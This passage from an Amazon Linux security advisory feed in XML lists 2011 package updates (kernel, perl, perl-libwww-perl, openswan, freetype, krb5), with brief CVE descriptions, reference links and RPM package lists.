</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1527" title="" id="CVE-2011-1527" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1379.html" title="" id="RHSA-2011:1379" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="krb5-devel" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.9-9.19.amzn1.x86_64.rpm</filename></package><package 
name="krb5-server-ldap" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.9-9.19.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-16</id><title>Amazon Linux - ALAS-2011-16: medium priority package update for kernel</title><issued date="2011-10-31 18:26:00" /><updated date="2014-09-14 14:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3191:
* A signedness issue was found in the Linux kernel's CIFS (Common Internet File System) implementation. A malicious CIFS server could send a specially-crafted response to a directory read request that would result in a denial of service or privilege escalation on a system that has a CIFS share mounted.
* A malicious CIFS (Common Internet File System) server could send a specially-crafted response to a directory read request that would result in a denial of service or privilege escalation on a system that has a CIFS share mounted.
CVE-2011-3188:
* The way IPv4 and IPv6 protocol sequence numbers and fragment IDs were generated could allow a man-in-the-middle attacker to inject packets and possibly hijack connections. Protocol sequence numbers and fragment IDs are now more random.
* IPv4 and IPv6 protocol sequence number and fragment ID generation could allow a man-in-the-middle attacker to inject packets and possibly hijack connections. Protocol sequence number and fragment IDs are now more random.
CVE-2011-2918:
* A flaw was found in the way the Linux kernel's Performance Events implementation handled PERF_COUNT_SW_CPU_CLOCK counter overflow. A local, unprivileged user could use this flaw to cause a denial of service.
CVE-2011-2723:
The skb_gro_header_slow function in include/linux/netdevice.h in the Linux kernel before 2.6.39.4, when Generic Receive Offload (GRO) is enabled, resets certain fields in incorrect situations, which allows remote attackers to cause a denial of service (system crash) via crafted network traffic.
* GRO (Generic Receive Offload) fields could be left in an inconsistent state. An attacker on the local network could use this flaw to cause a denial of service. GRO is enabled by default in all network drivers that support it.
* A flaw in skb_gro_header_slow() in the Linux kernel could lead to GRO (Generic Receive Offload) fields being left in an inconsistent state. An attacker on the local network could use this flaw to trigger a denial of service. GRO is enabled by default in all network drivers that support it.
CVE-2011-1833:
A race condition flaw was found in the way mount.ecryptfs_private checked the permissions of the directory to mount. A local attacker could use this flaw to mount (and then access) a directory they would otherwise not have access to. Note: The fix for this issue is incomplete until a kernel-space change is made. Future Red Hat Enterprise Linux 5 and 6 kernel updates will correct this issue.
* A race condition flaw was found in the Linux kernel's eCryptfs implementation. A local attacker could use the mount.ecryptfs_private utility to mount (and then access) a directory they would otherwise not have access to. Note: To correct this issue, the RHSA-2011:1241 ecryptfs-utils update, which provides the user-space part of the fix, must also be installed.
* A local attacker could use mount.ecryptfs_private to mount (and then access) a directory they would otherwise not have access to. Note: To correct this issue, the RHSA-2011:1241 ecryptfs-utils update must also be installed.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1833" title="" id="CVE-2011-1833" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2723" title="" id="CVE-2011-2723" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2918" title="" id="CVE-2011-2918" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3188" title="" id="CVE-2011-3188" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3191" title="" id="CVE-2011-3191" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-97.44.amzn1.noarch.rpm</filename></package><package name="perf" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" 
release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package><package name="perf" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-17</id><title>Amazon Linux - ALAS-2011-17: medium priority package update for perl-libwww-perl</title><issued date="2011-10-31 18:34:00" /><updated date="2014-09-14 14:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-0633:
The Net::HTTPS module in libwww-perl (LWP) before 6.00, as used in WWW::Mechanize, LWP::UserAgent, and other products, when running in environments that do not set the If-SSL-Cert-Subject header, does not enable full validation of SSL certificates by default, which allows remote attackers to spoof servers via man-in-the-middle (MITM) attacks involving hostnames that are not properly validated. NOTE: it could be argued that this is a design limitation of the Net::HTTPS API, and separate implementations should be independently assigned CVE identifiers for not working around this limitation. However, because this API was modified within LWP, a single CVE identifier has been assigned.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0633" title="" id="CVE-2011-0633" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="perl-libwww-perl" version="5.837" release="4.1.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-libwww-perl-5.837-4.1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-18</id><title>Amazon Linux - ALAS-2011-18: medium priority package update for openswan</title><issued date="2011-11-09 21:34:00" /><updated date="2014-09-14 14:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4073:
Use-after-free vulnerability in the cryptographic helper handler functionality in Openswan 2.3.0 through 2.6.36 allows remote authenticated users to cause a denial of service (pluto IKE daemon crash) via vectors related to the (1) quick_outI1_continue and (2) quick_outI1 functions.
A use-after-free flaw was found in the way Openswan's pluto IKE daemon used cryptographic helpers. A remote, authenticated attacker could send a specially-crafted IKE packet that would crash the pluto daemon. This issue only affected SMP (symmetric multiprocessing) systems that have the cryptographic helpers enabled. The helpers are disabled by default on Red Hat Enterprise Linux 5, but enabled by default on Red Hat Enterprise Linux 6.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4073" title="" id="CVE-2011-4073" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1422.html" title="" id="RHSA-2011:1422" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openswan" version="2.6.37" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-2.6.37-2.15.amzn1.i686.rpm</filename></package><package name="openswan-doc" version="2.6.37" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-doc-2.6.37-2.15.amzn1.i686.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-debuginfo-2.6.37-2.15.amzn1.i686.rpm</filename></package><package name="openswan" version="2.6.37" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-2.6.37-2.15.amzn1.x86_64.rpm</filename></package><package name="openswan-doc" version="2.6.37" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-doc-2.6.37-2.15.amzn1.x86_64.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-debuginfo-2.6.37-2.15.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-19</id><title>Amazon Linux - ALAS-2011-19: medium priority package update for perl</title><issued date="2011-11-09 21:48:00" /><updated date="2014-09-14 14:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3597:
It was found that the "new" constructor of the Digest module used its argument as part of the string expression passed to the eval() function. An attacker could possibly use this flaw to execute arbitrary Perl code with the privileges of a Perl program that uses untrusted input as an argument to the constructor.
Eval injection in the Digest module before 1.17 for Perl allows context-dependent attackers to execute arbitrary commands via the new constructor.
CVE-2011-2939:
Off-by-one error in the decode_xs function in Unicode/Unicode.xs in the Encode module before 2.44, as used in Perl before 5.15.6, might allow context-dependent attackers to cause a denial of service (memory corruption) via a crafted Unicode string, which triggers a heap-based buffer overflow.
A heap-based buffer overflow flaw was found in the way Perl decoded Unicode strings. An attacker could create a malicious Unicode string that, when decoded by a Perl program, would cause the program to crash or, potentially, execute arbitrary code with the permissions of the user running the program.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2939" title="" id="CVE-2011-2939" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3597" title="" id="CVE-2011-3597" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1424.html" title="" id="RHSA-2011:1424" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="perl-Term-UI" version="0.20" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Term-UI-0.20-119.12.amzn1.i686.rpm</filename></package><package name="perl-suidperl" version="5.10.1" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-suidperl-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-Object-Accessor" version="0.34" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Object-Accessor-0.34-119.12.amzn1.i686.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Pod-Escapes-1.04-119.12.amzn1.i686.rpm</filename></package><package name="perl-Digest-SHA" version="5.47" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Digest-SHA-5.47-119.12.amzn1.i686.rpm</filename></package><package name="perl-CPAN" version="1.9402" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CPAN-1.9402-119.12.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-ParseXS" version="2.2003.0" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-ExtUtils-ParseXS-2.2003.0-119.12.amzn1.i686.rpm</filename></package><package name="perl-IO-Compress-Base" version="2.020" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-IO-Compress-Base-2.020-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-Build" version="0.3500" release="119.12.amzn1" epoch="1" 
arch="i686"><filename>Packages/perl-Module-Build-0.3500-119.12.amzn1.i686.rpm</filename></package><package name="perl-libs" version="5.10.1" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-libs-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-MakeMaker" version="6.55" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-ExtUtils-MakeMaker-6.55-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-Load" version="0.16" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Load-0.16-119.12.amzn1.i686.rpm</filename></package><package name="perl-Time-Piece" version="1.15" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Time-Piece-1.15-119.12.amzn1.i686.rpm</filename></package><package name="perl-devel" version="5.10.1" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-devel-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.27" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-ExtUtils-CBuilder-0.27-119.12.amzn1.i686.rpm</filename></package><package name="perl-Archive-Extract" version="0.38" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Archive-Extract-0.38-119.12.amzn1.i686.rpm</filename></package><package name="perl-core" version="5.10.1" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-core-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-File-Fetch" version="0.26" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-File-Fetch-0.26-119.12.amzn1.i686.rpm</filename></package><package name="perl-version" version="0.77" release="119.12.amzn1" epoch="3" arch="i686"><filename>Packages/perl-version-0.77-119.12.amzn1.i686.rpm</filename></package><package name="perl-Archive-Tar" version="1.58" release="119.12.amzn1" epoch="0" 
arch="i686"><filename>Packages/perl-Archive-Tar-1.58-119.12.amzn1.i686.rpm</filename></package><package name="perl-Parse-CPAN-Meta" version="1.40" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Parse-CPAN-Meta-1.40-119.12.amzn1.i686.rpm</filename></package><package name="perl-Params-Check" version="0.26" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Params-Check-0.26-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-CoreList" version="2.18" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Module-CoreList-2.18-119.12.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.28" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-ExtUtils-Embed-1.28-119.12.amzn1.i686.rpm</filename></package><package name="perl-CPANPLUS" version="0.88" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CPANPLUS-0.88-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-Loaded" version="0.02" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Loaded-0.02-119.12.amzn1.i686.rpm</filename></package><package name="perl-Log-Message" version="0.02" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Log-Message-0.02-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-Pluggable" version="3.90" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Pluggable-3.90-119.12.amzn1.i686.rpm</filename></package><package name="perl-Log-Message-Simple" version="0.04" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Log-Message-Simple-0.04-119.12.amzn1.i686.rpm</filename></package><package name="perl-Test-Harness" version="3.17" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Test-Harness-3.17-119.12.amzn1.i686.rpm</filename></package><package name="perl-IPC-Cmd" version="0.56" release="119.12.amzn1" epoch="1" 
arch="i686"><filename>Packages/perl-IPC-Cmd-0.56-119.12.amzn1.i686.rpm</filename></package><package name="perl-IO-Compress-Zlib" version="2.020" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-IO-Compress-Zlib-2.020-119.12.amzn1.i686.rpm</filename></package><package name="perl-parent" version="0.221" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-parent-0.221-119.12.amzn1.i686.rpm</filename></package><package name="perl-Compress-Zlib" version="2.020" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Compress-Zlib-2.020-119.12.amzn1.i686.rpm</filename></package><package name="perl-CGI" version="3.51" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CGI-3.51-119.12.amzn1.i686.rpm</filename></package><package name="perl-IO-Zlib" version="1.09" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-IO-Zlib-1.09-119.12.amzn1.i686.rpm</filename></package><package name="perl-Test-Simple" version="0.92" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Test-Simple-0.92-119.12.amzn1.i686.rpm</filename></package><package name="perl-Compress-Raw-Zlib" version="2.023" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Compress-Raw-Zlib-2.023-119.12.amzn1.i686.rpm</filename></package><package name="perl-debuginfo" version="5.10.1" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-debuginfo-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-Load-Conditional" version="0.30" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Module-Load-Conditional-0.30-119.12.amzn1.i686.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Package-Constants-0.02-119.12.amzn1.i686.rpm</filename></package><package name="perl-Time-HiRes" version="1.9721" release="119.12.amzn1" epoch="4" 
arch="i686"><filename>Packages/perl-Time-HiRes-1.9721-119.12.amzn1.i686.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.18" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Locale-Maketext-Simple-0.18-119.12.amzn1.i686.rpm</filename></package><package name="perl" version="5.10.1" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-Pod-Simple" version="3.13" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Pod-Simple-3.13-119.12.amzn1.i686.rpm</filename></package><package name="perl-Time-HiRes" version="1.9721" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-Time-HiRes-1.9721-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Time-Piece" version="1.15" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Time-Piece-1.15-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Archive-Extract" version="0.38" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Archive-Extract-0.38-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-CPANPLUS" version="0.88" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CPANPLUS-0.88-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-libs" version="5.10.1" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-libs-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-parent" version="0.221" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-parent-0.221-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.27" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-ExtUtils-CBuilder-0.27-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.28" release="119.12.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perl-ExtUtils-Embed-1.28-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Params-Check" version="0.26" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Params-Check-0.26-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.18" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Locale-Maketext-Simple-0.18-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-ParseXS" version="2.2003.0" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-ExtUtils-ParseXS-2.2003.0-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Archive-Tar" version="1.58" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Archive-Tar-1.58-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Pod-Escapes-1.04-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-devel" version="5.10.1" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-devel-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Object-Accessor" version="0.34" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Object-Accessor-0.34-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Log-Message" version="0.02" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Log-Message-0.02-119.12.amzn1.x86_64.rpm</filename></package><package name="perl" version="5.10.1" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-CoreList" version="2.18" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Module-CoreList-2.18-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Log-Message-Simple" version="0.04" 
release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Log-Message-Simple-0.04-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Pod-Simple" version="3.13" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Pod-Simple-3.13-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Compress-Zlib" version="2.020" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Compress-Zlib-2.020-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Parse-CPAN-Meta" version="1.40" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Parse-CPAN-Meta-1.40-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Compress-Raw-Zlib" version="2.023" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Compress-Raw-Zlib-2.023-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-MakeMaker" version="6.55" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-ExtUtils-MakeMaker-6.55-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Compress-Zlib" version="2.020" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-IO-Compress-Zlib-2.020-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Loaded" version="0.02" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Loaded-0.02-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Load-Conditional" version="0.30" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Module-Load-Conditional-0.30-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Compress-Base" version="2.020" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-IO-Compress-Base-2.020-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-CPAN" version="1.9402" release="119.12.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perl-CPAN-1.9402-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Pluggable" version="3.90" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Pluggable-3.90-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Digest-SHA" version="5.47" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Digest-SHA-5.47-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-File-Fetch" version="0.26" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-File-Fetch-0.26-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-CGI" version="3.51" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CGI-3.51-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Test-Simple" version="0.92" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Test-Simple-0.92-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Build" version="0.3500" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Build-0.3500-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-version" version="0.77" release="119.12.amzn1" epoch="3" arch="x86_64"><filename>Packages/perl-version-0.77-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-debuginfo" version="5.10.1" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-debuginfo-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-suidperl" version="5.10.1" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-suidperl-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Package-Constants-0.02-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Zlib" version="1.09" release="119.12.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/perl-IO-Zlib-1.09-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Term-UI" version="0.20" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Term-UI-0.20-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-core" version="5.10.1" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-core-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-IPC-Cmd" version="0.56" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-IPC-Cmd-0.56-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Test-Harness" version="3.17" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Test-Harness-3.17-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Load" version="0.16" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Load-0.16-119.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-20</id><title>Amazon Linux - ALAS-2011-20: important priority package update for freetype</title><issued date="2011-11-19 01:18:00" /><updated date="2014-09-14 14:42:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3439:
Multiple input validation flaws were found in the way FreeType processed CID-keyed fonts. If a specially-crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
